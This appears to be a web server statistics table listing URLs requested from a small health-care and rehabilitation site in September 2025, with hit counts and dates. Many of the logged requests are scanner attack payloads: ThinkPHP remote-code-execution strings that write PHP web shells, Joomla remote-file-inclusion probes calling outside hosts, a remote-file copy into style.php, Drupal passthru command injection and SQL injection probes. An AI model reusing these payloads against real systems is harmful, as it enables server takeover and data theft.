13 | 20/Sep/25 09:26 | /?%3B&poru=wVpDrbkxF4Rrl8BxRMvikKi307Gn8Pfbz4jdPSLG/cOaDiIc6laFBgTBWkzomrK3Pqzrm25UpA2NsMi/iZ4UBkGjHET | |
13 | 20/Sep/25 09:27 | /?;&poru=wVpDrbkxF4Rrl8BxRMvikKi307Gn8Pfbz4jdPSLG/cOaDiIc6laFBgTBWkzomrK3Pqzrm25UpA2NsMi/iZ4UBkGjHET | |
13 | 23/Sep/25 23:59 | /?GLOBALS&_REQUEST&_REQUEST[Itemid]=1&_REQUEST[option]=com_frontpage&mosConfig_absolute_path=http://www.maruyichi.com/a1.txt%3F | |
13 | 23/Sep/25 20:43 | /?function=call_user_func_array&s=/index/\think\app/invokefunction&vars[0]=file_put_contents&vars[1][]=<%3Fphp print&vars[1][]=ezbxx.php | |
13 | 20/Sep/25 06:29 | /?;content=<php>die(@md5(HelloThinkCMF))</php>&a=fetch | |
13 | 25/Sep/25 03:17 | /?act=dispBoardWrite&%3Bmid=qna | |
13 | 20/Sep/25 08:16 | /?url=data://text/plain;base64 | |
13 | 23/Sep/25 23:59 | /?amp&=328&mode=getshouts | |
12 | 23/Sep/25 03:15 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194521542 | |
12 | 23/Sep/25 03:15 | /?amp;fmd5=A07383FD74F1C76B5561E094845D4E0D&pcode=tN41RDypBr0x-1UDB0 Q3cHCgvTucHOt&userid=10307&v=2 | |
12 | 23/Sep/25 11:44 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194558733 | |
12 | 20/Sep/25 09:09 | /?page==data://text/plain;base64 | |
12 | 26/Sep/25 22:48 | /?C=S;O=A | |
12 | 23/Sep/25 08:08 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194524601 | |
12 | 23/Sep/25 01:19 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194549857 | |
12 | 22/Sep/25 20:53 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194549865 | |
12 | 20/Sep/25 09:20 | /?%3B&&poru=mq8QGh5Zk8pEcAVa8R/D04cgPBqIvh82WQTgLe0VISFZTbFe3Jj2vm+qzIEt6o4 | |
12 | 23/Sep/25 23:59 | /?amp&=62&mode=8 | |
12 | 20/Sep/25 09:24 | /?%3B&poru=wVpDrbkxF4Rrl8BxRMvikKi307Gn8Pfbz4jdPSLG/cOaDiIc6laFBgT | |
12 | 20/Sep/25 09:24 | /?%3B&&poru=YjRViLOYfqPbnb7Ogl+Xklb76hhHxd8Bz9J4YfBWBu2d2VXBr9cZGE0+6JyFJRRojjx+wImPBymrgTR2Af25JNiOavia1vJ1eMyTVTZvyxg%3D | |
12 | 30/Sep/25 14:42 | /?action=showform | |
12 | 20/Sep/25 09:18 | /?page==data://text/plain | |
12 | 23/Sep/25 20:43 | /?function=call_user_func_array&s=index/think\\app/invokefunction&vars[0]=assert&vars[1][]=@eval | |
12 | 23/Sep/25 03:14 | /?Itemid=50&id=10&mosConfig_absolute_path=http://www.maryknoll.org/k12/id.txt?&option=com_admin&task=com_frontpage | |
12 | 30/Sep/25 14:59 | /?=328&mode=getshouts | |
12 | 23/Sep/25 00:41 | /?amp;fmd5=A07383FD74F1C76B5561E094845D4E0D&pcode=tN41RDypBr0x-1UDB0&userid=10307&v=2 | |
12 | 23/Sep/25 14:59 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194557173 | |
12 | 20/Sep/25 06:27 | /?%3B&GLOBALS&_REQUEST&_REQUEST[Itemid]=1&_REQUEST[option]=com_content&mosConfig_absolute_path=http://mildnet.ml/scan/inj/tools/j2.jpg%3F%3F | |
12 | 23/Sep/25 05:10 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194553797 | |
12 | 20/Sep/25 09:23 | /?fp=SUxk7FxHpuP30ygW2i 0XwuQFkzG8Dv JmKUikEWRNjJ5a6zzKM93zmdTSjk2uBWZmmEIzVmg/vUGAQDEmHS4A%3D%3D&poru=XfERbEnjeH 8VN85 YQ2IIWxIMBIL4QZVag3/tOxRLJlu2nSS6qt7dy&prvtof=hytJZmQ5aiTdApgc4nWQIIPlkxZBRgP3pOUFNxrb2Fs%3D | |
12 | 30/Sep/25 23:22 | /?=976&mode=4 | |
12 | 20/Sep/25 09:20 | /?%3B&&pcode=aV-9tB9Q-3Rt9jk+f7nqtkky0vtzrr6o | |
12 | 23/Sep/25 03:15 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194520574 | |
12 | 20/Sep/25 09:19 | /?page=%3Ddata://text/plain%3Bbase64,PD9waHAgZWNobyAiZHNmZXIzNHc1Ii4icmxzaWRmb3NkZWRmcHNkIjtkaWUoKTs/Pgo%3D | |
12 | 20/Sep/25 09:25 | /?as_occt=any&as_q=phone number for health care and rehabilitation&as_qdr=all&back=https://www.google.com/search%3Fclient%3Dsafari&channel=aplab&hl=en&safe=active&source=a-app1 | |
12 | 30/Sep/25 22:44 | /?name=example.com&type=A | |
12 | 30/Sep/25 03:27 | /?pcode=7JJywOwwuc8MpOKEx+H-6tWeF5j5k5l1&userid=10199&v=2 | |
12 | 23/Sep/25 08:47 | /?cacheFile=dvgca.php&content=<%3Fphp mb_ereg_replace&s=index/\think\template\driver\file/write | |
12 | 25/Sep/25 00:50 | /?back=https://www.google.com/search%3Fclient%3Dsafari%26as_qdr%3Dall%26as_occt%3Dany%26safe%3Dactive%26as_q%3Dphone+number+for+health+care+and+rehabilitation%26channel%3Daplab%26source%3Da-app1%26hl%3Den | |
12 | 20/Sep/25 09:22 | /?%3B&fp=PQcQo8VPZm7t3nkMbsqSHlzQYGqqEzprzM/wBh3yg50h6ImYV4039MfjJ+la+FOssTdQdBvqavSnisYOlK5JYg%3D%3D&poru=22UxTzPi30dGww0980l0HAALmBbQnHyLCcmrDqtFGKl51iQxYMf51M2Ib9RXp58oWIzVe5d7JUXAQ2Ake7aiphVMPWcI1tB/jTSBWKItAPk%3D&prvtof=Fp4++fj3zCgC6S6tEgHooT7P/B0nitbu2WhHRWY/P2E%3D | |
12 | 20/Sep/25 12:05 | /?%3Bfp=1SR40b2rpHuLQjJA76hFT9HvAyWM3luXWA7zzZ1SUDrAgL4oi7UWuWEAVlKen3GpSlCzkbT | |
12 | 22/Sep/25 22:21 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194543485 | |
12 | 22/Sep/25 20:53 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194534745 | |
12 | 23/Sep/25 05:48 | /?Itemid=50&id=10&mosConfig_absolute_path=http://www.mantisowh.be/images/stories/id.txt?&option=com_categories&task=com_frontpage | |
12 | 23/Sep/25 10:18 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194563613 | |
12 | 20/Sep/25 09:20 | /?%3B&fp=CRQxsqwddyRYq1rRnPJdHCe5tngiC3YVU94nWIV8eEUu60xW00bfY7p3ED4OjcGnD/TzehTLgftBemV7f4s3cw%3D%3D&poru=j/4q1vQVpUJoiMlDLx7oXcNGRO5w74D1iCkpE9NUYV01suV&prvtof=yAIRaoEcax0+1vZQsG+RG7xkKD73XvK5+vtMHQir1G0%3D | |
12 | 22/Sep/25 23:12 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194481497 | |
12 | 23/Sep/25 05:10 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194522025 | |
12 | 23/Sep/25 14:24 | /?amp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&utm_medium=email&utm_term=0_13db423abe-d6c1391a2a-194467245 | |
12 | 20/Sep/25 07:15 | /?%3B&GLOBALS&_REQUEST&_REQUEST[Itemid]=1&_REQUEST[option]=com_frontpage&mosConfig_absolute_path=http://www.maruyichi.com/a1.txt | |
12 | 24/Sep/25 22:56 | /?mode=8&&=0 | |
12 | 30/Sep/25 16:50 | /?mode=328&&=682 | |
11 | 20/Sep/25 09:16 | /?%3B&%3Bfunction=call_user_func_array&%3Bs=/index/\think\app/invokefunction&vars[0]=file_put_contents&vars[1][]=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>$&vars[1][]=ntdos.php | |
11 | 20/Sep/25 09:21 | /?%3Bfp=1SR40b2rpHuLQjJA76hFT9HvAyWM3luXWA7zzZ1SUDrAgL4oi7UWuWEAVlKen3GpSlCzkbT 9o KefR4EGpz9w==&%3Bporu=b39hYqk96Nd/PTIDsO/QbyAwPUNEDijlsc4p9dz0NSvvx My4vBjdvOrb1Vlmzw&prvtof=f7wJD7zg5AwbXzbvt22vqHSMoYRSaYYw1c1XU7lDueY= | |
11 | 20/Sep/25 09:26 | /?fp=oBKWNMR+w/hT9I2zcmJ7XB48cMhWJLqEbDJY3HGvDKupMiT8Zc1Zptmcgql8f3gorr30UdpcbboY2xyeLfogDw%3D%3D&poru=wVpDrbkxF4Rrl8BxRMvikKi307Gn8Pfbz4jdPSLG/cOaDiIc6laFBgTBWkzomrK3Pqzrm25UpA2NsMi/iZ4UBkGjHETCN5i86L6BzTwgxx0%3D&prvtof=XFvTywJStwb6sd07F06BitXLcHmhtoFNVBkcSuQCV9M%3D | |
11 | 30/Sep/25 15:55 | /?amp%3Bamp%3Bporu=XfERbEnjeH+8VN85+YQ2IIWxIMBIL4QZVag3/tOxRLJlu2nSS6qt7dy&%3Bamp%3Bamp%3Bprvtof=hytJZmQ5aiTdApgc4nWQIIPlkxZBRgP3pOUFNxrb2Fs%3D&%3Bfp=SUxk7FxHpuP30ygW2i+0XwuQFkzG8Dv+JmKUikEWRNjJ5a6zzKM93zmdTSjk2uBWZmmEIzVmg/vUGAQDEmHS4A%3D%3D | |
11 | 20/Sep/25 09:24 | /?function=call_user_func_array&s=/index/\think\app/invokefunction&vars[0]=file_put_contents&vars[1][]=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>$&vars[1][]=mgpyj.php | |
11 | 25/Sep/25 18:08 | /?amp&%3Bamp%3Bamp%3Bamp%3Bamp=990&%3Bamp%3Bamp%3Bamp=584 | |
11 | 22/Sep/25 23:51 | /?;&prvtof=yAIRaoEcax0 1vZQsG RG7xkKD73XvK5 vtMHQir1G0%3D | |
11 | 24/Sep/25 00:43 | /?;m=2013&c=ZAP | |
11 | 20/Sep/25 09:28 | /?amp;function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>$&vars[1][]=rnjiw.php&s=/index/\think\app/invokefunction | |
11 | 20/Sep/25 09:24 | /?amp;cacheFile=aiomp.php&content=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>&s=index/\think\template\driver\file/write | |
11 | 30/Sep/25 21:30 | /?%3Bamp=58& | |
11 | 30/Sep/25 13:59 | /?fp=CRQxsqwddyRYq1rRnPJdHCe5tngiC3YVU94nWIV8eEUu60xW00bfY7p3ED4OjcGnD/TzehTLgftBemV7f4s3cw%3D%3D&poru=j/4q1vQVpUJoiMlDLx7oXcNGRO5w74D1iCkpE9NUYV01suV&prvtof=yAIRaoEcax0+1vZQsG+RG7xkKD73XvK5+vtMHQir1G0%3D | |
11 | 20/Sep/25 09:18 | /?page==data://text/plain;base64,PD9waHAgZWNobyAiZHNmZXIzNHc1Ii4icmxzaWRmb3NkZWRmcHNkIjtkaWUoKTs/Pgo%3D | |
11 | 29/Sep/25 18:58 | /?GLOBALS&_REQUEST&_REQUEST[Itemid]=1&_REQUEST[option]=com_frontpage&mosConfig_absolute_path=http://www.maruyichi.com/a1.txt | |
11 | 20/Sep/25 09:27 | /?fp=CRQxsqwddyRYq1rRnPJdHCe5tngiC3YVU94nWIV8eEUu60xW00bfY7p3ED4OjcGnD/TzehTLgftBemV7f4s3cw==&poru=bSuYcmKVYPYURIv1BbP9tMAlVVQLeCS2te2GZxpSPMHmPT265IiYSSlsSKLd8rvDWU7GR8ChROau4ylZxnnd6Q==&prvtof=zf1cGfrN9RLN0lSlpKwkuXv+lmlwyzIu9umsgl9uVPo= | |
11 | 20/Sep/25 08:02 | /?%3B&vars | |
11 | 20/Sep/25 09:24 | /?fp=SUxk7FxHpuP30ygW2i 0XwuQFkzG8Dv JmKUikEWRNjJ5a6zzKM93zmdTSjk2uBWZmmEIzVmg/vUGAQDEmHS4A==&poru=XfERbEnjeH 8VN85 YQ2IIWxIMBIL4QZVag3/tOxRLJlu2nSS6qt7dy&prvtof=hytJZmQ5aiTdApgc4nWQIIPlkxZBRgP3pOUFNxrb2Fs= | |
11 | 20/Sep/25 14:54 | /?mode=106&&=58 | |
11 | 20/Sep/25 09:21 | /?<em/index.php%3Foption=com_user&layout=confirm&view=reset | |
11 | 20/Sep/25 09:32 | /?a=fetch&content=<%3Fphp copy('http://imcaccess.applinzi.com/01/js.css','style.php')%3B&prefix=''&templateFile=public/index | |
11 | 20/Sep/25 09:27 | /?amp;fmd5=6AA37B9112E8D138E93595D71181F833&fsession=268276310C270313A2E42662F827625C26A26625C310A26A26626827426A26A1E&pcode=aV-9tB9Q-3Rt9jk+f7nqtkky0vtzrr6o&userid=10191&v=2 | |
11 | 18/Sep/25 16:27 | /?mode=getshouts&&=644 | |
11 | 20/Sep/25 09:18 | /?page=%3Ddata://text/plain;base64,PD9waHAgZWNobyAiZHNmZXIzNHc1Ii4icmxzaWRmb3NkZWRmcHNkIjtkaWUoKTs/Pgo%3D | |
11 | 20/Sep/25 09:20 | /?amp;cacheFile=isvuc.php&content=<%3Fphp mb_ereg_replace&s=index/\think\template\driver\file/write | |
11 | 20/Sep/25 09:21 | /?fp=VVW3zxnBUIOpV99JURNyRtnt86a6KsxgTYhc3iw1YOKeGobsf+Rfk3/7lC8xVY29B/FbkRXZ727X/oroEK+Y6w==&poru=4ZqFAgov7j5LlMSSaHY0GJb2z1Lo2k5wU/q9maLSwZYsbsHDwJ0IdGiqGw9kyPEHL0GeYMa3wef+b8X2+4vcnE5dhcopzDohO3CKZbWO0ow=&prvtof=2iDowtJuUi5ndCiT0207nt07h4UdpLB7rBIWqfHxPgI= | |
10 | 20/Sep/25 09:00 | /?function=call_user_func_array&s=/index/\think\app/invokefunction&vars[0]=file_put_contents&vars[1][]=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>$&vars[1][]=rnjiw.php | |
10 | 20/Sep/25 09:21 | /?fp=CRQxsqwddyRYq1rRnPJdHCe5tngiC3YVU94nWIV8eEUu60xW00bfY7p3ED4OjcGnD/TzehTLgftBemV7f4s3cw==&poru=j/4q1vQVpUJoiMlDLx7oXcNGRO5w74D1iCkpE9NUYV01suV88m0nX+W89cuXl1KpbP8NJfJIALZ0CAX1RYk6iA==&prvtof=yAIRaoEcax0+1vZQsG+RG7xkKD73XvK5+vtMHQir1G0= | |
10 | 20/Sep/25 09:02 | /?page==data://text/plain%3Bbase64 | |
10 | 20/Sep/25 08:03 | /?%3B&prvtof=yAIRaoEcax0+1vZQsG+RG7xkKD73XvK5+vtMHQir1G0%3D | |
10 | 20/Sep/25 09:22 | /?amp;cacheFile=robots1.php&content=xbshell<%3Fphp @eval&s=index/\\think\\template\\driver\\file/write | |
10 | 18/Sep/25 16:14 | /?mode=getshouts&&=328 | |
10 | 30/Sep/25 21:03 | /?prvtof=yAIRaoEcax0+1vZQsG+RG7xkKD73XvK5+vtMHQir1G0%3D | |
10 | 20/Sep/25 09:26 | /?%3Bprvtof=abTmb0jSpNqE6ionxYaD6DLBe6S1YvmfZ6O3QJwOnZg= | |
10 | 20/Sep/25 09:14 | /?GLOBALS=&_REQUEST[Itemid]=1&_REQUEST[option]=com_content&_REQUEST=&mosConfig_absolute_path=test? | |
10 | 19/Sep/25 23:30 | /?C=S%3BO=A | |
10 | 20/Sep/25 00:03 | /?%3Bamp;vars | |
10 | 30/Sep/25 23:01 | /?%3Bamp%3Bamp%3Bporu=Am3qqkTnfTaxztrCdmgao4WR6Cwjff3mHylcCPMh9c4DrBZKkJJHYDg1VbjHXCy19chr9rXWNpF8PTVzAI/+nbdm9kMU6Bj7ddnLHP75RWw%3D& | |
10 | 20/Sep/25 08:02 | /?q[%2523][]=passthru&q[%2523markup]=echo InfoOS:`uname -sn%3Bid`OSInfo&q[%2523type]=markup | |
10 | 20/Sep/25 07:10 | /?GLOBALS=&_REQUEST[Itemid]=1&_REQUEST[option]=com_sections&_REQUEST=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt? | |
10 | 20/Sep/25 09:11 | /?GLOBALS=&_REQUEST[Itemid]=1&_REQUEST[option]=com_content&_REQUEST=&mosConfig_absolute_path=? | |
10 | 30/Sep/25 12:30 | /?ref=scoop20 | |
10 | 20/Sep/25 09:27 | /?destination=node%3Fq[%2523][]=passthru&q[%2523markup]=echo InfoOS:`uname -sn%3Bid`OSInfo&q[%2523type]=markup&q=node/99/delete | |
10 | 20/Sep/25 09:24 | /?fp=oBKWNMR w/hT9I2zcmJ7XB48cMhWJLqEbDJY3HGvDKupMiT8Zc1Zptmcgql8f3gorr30UdpcbboY2xyeLfogDw==&poru=Gj9TYuL2jhbzO17tQKwQBc3EftodOOuteLoKQY9Cbob6fc7P/P3OrFE14G/k0FXb0C7QuAJyhBRaooyVhPG6Dkp7MdgG69wGeVuCPSAHdC8=&prvtof=gkAtfapr qBr0dkbY0Tgeql1Y6qKETY/eQBH6evShwQ= | |
10 | 20/Sep/25 09:24 | /?fp=oBKWNMR w/hT9I2zcmJ7XB48cMhWJLqEbDJY3HGvDKupMiT8Zc1Zptmcgql8f3gorr30UdpcbboY2xyeLfogDw%3D%3D&poru=Gj9TYuL2jhbzO17tQKwQBc3EftodOOuteLoKQY9Cbob6fc7P/P3OrFE14G/k0FXb0C7QuAJyhBRaooyVhPG6Dkp7MdgG69wGeVuCPSAHdC8%3D&prvtof=gkAtfapr qBr0dkbY0Tgeql1Y6qKETY/eQBH6evShwQ%3D | |
10 | 20/Sep/25 05:25 | /?%3Bamp;amp=976 | |
10 | 20/Sep/25 08:35 | /?cacheFile=oigzr.php&content=<%3Fphp assert($_REQUEST["404"])%3B%3F>xise404&s=index/\think\template\driver\file/write | |
10 | 30/Sep/25 10:09 | /?poru=mq8QGh5Zk8pEcAVa8R/D04cgPBqIvh82WQTgLe0VISFZTbFe3Jj2vm+qzIEt6o4 | |
10 | 29/Sep/25 17:40 | /?page=login | |
10 | 20/Sep/25 05:15 | /?%3Bamp;utm_campaign=d6c1391a2a-COVID-19-UPDATE-9&%3Bamp;utm_medium=email | |
10 | 20/Sep/25 09:23 | /?fp=7nbPGCsfVnj1JCc/g38v/hvhW+8V8qWU1OuIzMQBywLlld7NSfXakes86xaEdoFPvpE3xxNnvewVch+kMUErBA==&poru=wHTVIIReT2wzLxW5OfCS+T+roZ6b6Jo3cpE0+Jd9cDom3wUjjYZviNzBcbVh7FJH0Igs5W9qaAYwtexe11Gnf3RzaJlDAzf2bUcFkyrhdk0=&prvtof=abTmb0jSpNqE6ionxYaD6DLBe6S1YvmfZ6O3QJwOnZg= | |
10 | 20/Sep/25 09:19 | /?%3Bamp;vars[1][]=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>$&%3Bamp;vars[1][]=ntdos.php&%3Bfunction=call_user_func_array&%3Bs=/index/\think\app/invokefunction&vars[0]=file_put_contents | |
10 | 19/Sep/25 23:29 | /?%3Bamp;pcode=aV-9tB9Q-3Rt9jk+f7nqtkky0vt | |
10 | 20/Sep/25 09:26 | /?%3B&poru=Gj9TYuL2jhbzO17tQKwQBc3EftodOOuteLoKQY9Cbob6fc7P/P3OrFE14G/k0FXb0C7QuAJyhBRaooyVhPG6Dkp7MdgG69wGeVuCPSAHdC8= | |
10 | 20/Sep/25 04:55 | /?mode=8&&=62 | |
10 | 18/Sep/25 16:12 | /?mode=4&&=976 | |
10 | 20/Sep/25 09:22 | /?fp=VVW3zxnBUIOpV99JURNyRtnt86a6KsxgTYhc3iw1YOKeGobsf+Rfk3/7lC8xVY29B/FbkRXZ727X/oroEK+Y6w==&poru=4ZqFAgov7j5LlMSSaHY0GJb2z1Lo2k5wU/q9maLSwZYsbsHDwJ0IdGi&prvtof=2iDowtJuUi5ndCiT0207nt07h4UdpLB7rBIWqfHxPgI= | |
10 | 20/Sep/25 07:10 | /?GLOBALS=&_REQUEST[Itemid]=1&_REQUEST[option]=com_cpanel&_REQUEST=&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt?? | |
10 | 23/Sep/25 20:44 | /?pcode=7JJywOwwuc8MpOKEx H-6tWeF5j5k5l1&userid=10199&v=2 | |
10 | 20/Sep/25 07:21 | /?GLOBALS=&_REQUEST[Itemid]=1&_REQUEST[option]=com_frontpage&_REQUEST=&mosConfig_absolute_path=http://www.maruyichi.com/a1.txt?? | |
10 | 20/Sep/25 09:19 | /?page==data://text/plain;base64,PD9waHAgZWNobyAiZHNmZXIzNHc1Ii4icmxzaWRmb3NkZWRmcHNkIjtkaWUoKTs/Pgo= | |
10 | 20/Sep/25 09:00 | /?%3B&function=call_user_func_array&s=/index/\think\app/invokefunction&vars[0]=file_put_contents&vars[1][]=<%3Fphp mb_ereg_replace('.*',@$_REQUEST[_], '', 'e')%3B%3F>$&vars[1][]=rnjiw.php | |
10 | 20/Sep/25 09:26 | /?_REQUEST&GLOBALS&_REQUEST[Itemid]=1&_REQUEST[option]=com_cpanel&mosConfig_absolute_path=http://www.adec-web.com/templates/id.txt%3F | |
27354 | 10.18% | 1/Oct/25 02:20 | /usage/ref_201711.phtml |
24192 | 13.87% | 1/Oct/25 02:21 | /May2014.html |
25 | 0.02% | 30/Sep/25 21:08 | /May2014.html?0x27%3B'\"'A=0+AnD+BeNChMaRK(2999999,MD5(NOW())) |
15 | 0.01% | 30/Sep/25 10:54 | /May2014.html?''0x27%3B/Neko_php=''+aND+BeNChMaRK(2999999,Md5(NoW()))+AnD+'1 |
14 | 0.01% | 25/Sep/25 10:54 | /May2014.html?''0x27;/Neko.php |
14 | 0.01% | 20/Sep/25 09:22 | /May2014.html?''0x27%3B/Neko_php='+aND+BeNChMaRK(2999999,Md5(NoW()))+AnD+'1'[0] |
12 | 0.01% | 20/Sep/25 09:24 | /May2014.html?0x27%3B"+or+(1,2)=(select*from(select+name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)+--+"x"%3D"x |
12 | 0.01% | 18/Sep/25 23:11 | /May2014.html?''0x27; |
11 | 0.01% | 29/Sep/25 12:15 | /May2014.html?''0x27 |
10 | 0.01% | 24/Sep/25 04:42 | /May2014.html?0x27;%2527%255C%2522 |
10 | 0.01% | 17/Sep/25 06:23 | /May2014.html?0x27%3B'\x5C"999999.1+union+select+unhex(hex(version()))+--+and+1=1 |
11974 | 0.98% | 1/Oct/25 02:17 | /February2012.html |
16 | 30/Sep/25 13:33 | /February2012.html?t=web+AND+1%3D1 | |
15 | 1/Oct/25 00:06 | /February2012.html?amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bposition=13' | |
13 | 30/Sep/25 10:09 | /February2012.html?position=13'+AnD+sLeep(3)+ANd+'1 | |
11101 | 4.94% | 1/Oct/25 02:20 | /usage/ref_201909.phtml |
4091 | 2.09% | 1/Oct/25 00:39 | /usage/ref_201909.phtml?amp |
11010 | 0.01% | 1/Oct/25 02:12 | /robots.txt |
8884 | 0.92% | 1/Oct/25 02:13 | /usage/March2014/ref_201403.phtml |
12 | 27/Sep/25 15:23 | /usage/March2014/ref_201403.phtml?amp%3Bamp%3Bamp%3Bsa=X or &%3Bamp%3Bamp%3Bved=2ahUKEwij5-bS5vPmAhWGGM0KHRfyBKMQFjBeegQIARAB | |
8402 | 0.50% | 1/Oct/25 02:21 | /usage/ref_201501.phtml |
5322 | 0.58% | 1/Oct/25 02:03 | /usage/ref_201402.phtml |
13 | 30/Sep/25 03:48 | /usage/ref_201402.phtml?sa=U))+ORDER+BY+2315--+QFci | |
4650 | 0.67% | 1/Oct/25 02:19 | /usage/November2014/ref_201411.phtml |
4299 | 0.06% | 1/Oct/25 02:12 | /usage/ |
62 | 1/Oct/25 00:09 | /usage/?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=echo InfoOS:`uname -sn;id`OSInfo | |
42 | 30/Sep/25 19:52 | /usage/?tiki-register.php | |
32 | 1/Oct/25 00:09 | /usage/?amp;q[%2523markup]=echo InfoOS:`uname -sn;id`OSInfo&q[%2523type]=markup&q[%2523][]=passthru | |
20 | 30/Sep/25 14:01 | /usage/?q=user/register | |
17 | 30/Sep/25 23:38 | /usage/?s=Register | |
10 | 27/Sep/25 20:49 | /usage/?fields=md5(958404411)--+X | |
3138 | 0.58% | 1/Oct/25 02:00 | /usage/ref_201301.phtml |
2962 | 1.75% | 1/Oct/25 02:03 | /usage/ref_202205.phtml |
2771 | 0.60% | 1/Oct/25 01:16 | /usage/ref_202107.phtml |
539 | 0.12% | 1/Oct/25 01:10 | /usage/ref_202107.phtml?g2_view=comment.AddComment&g2_itemId=17960%0A1 0.00 0 http://iplcv.com/comment/html/?357604.html%0A1 0.00 0 http://isao.s28.xrea.com/guest/fantasy.cgi/fantasy.cgi?ap=7 |
56 | 0.01% | 30/Sep/25 14:03 | /usage/ref_202107.phtml?amp;amp;amp;amp;amp;amp;g2_itemid=17960 |
10 | 30/Sep/25 18:46 | /usage/ref_202107.phtml?amp | |
2759 | 0.41% | 1/Oct/25 00:43 | /September2014.html |
17 | 30/Sep/25 14:38 | /September2014.html?%C2%B4''0x27%3B"+or+(1,2)=(select*from(select+name_const(CHAR(111,108,111,108,111,11QMCdo4yAEQFgi0ATAj | |
15 | 20/Sep/25 09:20 | /September2014.html?%EF%BF%BD0x27%3B"+or+(1,2)=nvOpzp%3B+AND+1%3D1+OR+(<">iKO)), | |
14 | 30/Sep/25 19:49 | /September2014.html?%EF%BF%BD0x27%3B"+or+(1,2)=nvOpzp%3B+AND+1%3D1+OR+(<">iKO)),'nvOpzp%3B+AND+1%3D1+OR+(<'">iKO)), | |
11 | 28/Sep/25 20:17 | /September2014.html?%C2%B4''0x27%3B"+or+(1,2)=(select*from(select+name_const(CHAR(111,108,111,108,111,11QMCdo4yAEQFgi0ATAj'A%3D0 | |
1947 | 0.80% | 1/Oct/25 02:16 | /usage/November2019/ref_201909.phtml |
1938 | 0.95% | 30/Sep/25 20:04 | /usage/agent_201801.phtml |
1543 | 1.64% | 1/Oct/25 02:14 | /usage/ref_202007.phtml |
1531 | 0.34% | 1/Oct/25 01:35 | /usage/ref_201303.phtml |
472 | 0.09% | 1/Oct/25 01:35 | /usage/ref_201303.phtml?action=showform |
1452 | 0.02% | 1/Oct/25 01:35 | /favicon.ico |
1427 | 0.25% | 1/Oct/25 01:27 | /usage/ref_201405.phtml |
1413 | 0.70% | 1/Oct/25 02:05 | /usage/ref_201701.phtml |
1397 | 0.01% | 1/Oct/25 00:22 | /thrColLiqHdr.css |
1244 | 0.62% | 1/Oct/25 02:07 | /usage/ref_201901.phtml |
1218 | 0.02% | 30/Sep/25 23:33 | /aircastboots.phtml |
11 | 29/Sep/25 19:06 | /aircastboots.phtml?%3Bsa=X&ved=0ahUKEwibgs7q37jTAhWLalAKHQ-WAA0Q9QEIDjAA | |
1129 | 0.33% | 1/Oct/25 02:18 | /usage/July2020/ref_202007.phtml |
1115 | 0.01% | 30/Sep/25 20:24 | /interac_logo.gif |
1101 | 30/Sep/25 20:24 | /MC_logo.gif | |
1099 | 30/Sep/25 20:24 | /visa_logo.gif | |
1095 | 0.01% | 30/Sep/25 20:24 | /img_bluebox.gif |
992 | 1.15% | 1/Oct/25 00:59 | /usage/ref_201811.phtml |
992 | 0.02% | 30/Sep/25 20:24 | /images/healthcare_rehab.jpg |
941 | 2.65% | 1/Oct/25 01:36 | /sitemap.xml |
806 | 0.48% | 30/Sep/25 21:57 | /usage/ref_201903.phtml |
784 | 0.34% | 1/Oct/25 01:47 | /usage/ref_201304.phtml |
770 | 0.01% | 1/Oct/25 00:22 | /orthopedic.phtml |
723 | 0.07% | 1/Oct/25 02:05 | /usage/agent_201311.phtml |
11 | 25/Sep/25 06:06 | /usage/agent_201311.phtml?sa=X&ved=2ahUKEwj5hJrukIbnAhVVxzgGHZHQC0gQFjBYegQICRAB | |
670 | 30/Sep/25 22:30 | /html/templates/ja_purity/html/com_content/article/ | |
348 | 30/Sep/25 22:15 | /html/templates/ja_purity/html/com_content/article/?q=node/add | |
252 | 30/Sep/25 21:49 | /html/templates/ja_purity/html/com_content/article/?q=user | |
24 | 30/Sep/25 22:30 | /html/templates/ja_purity/html/com_content/article/?q=user/register | |
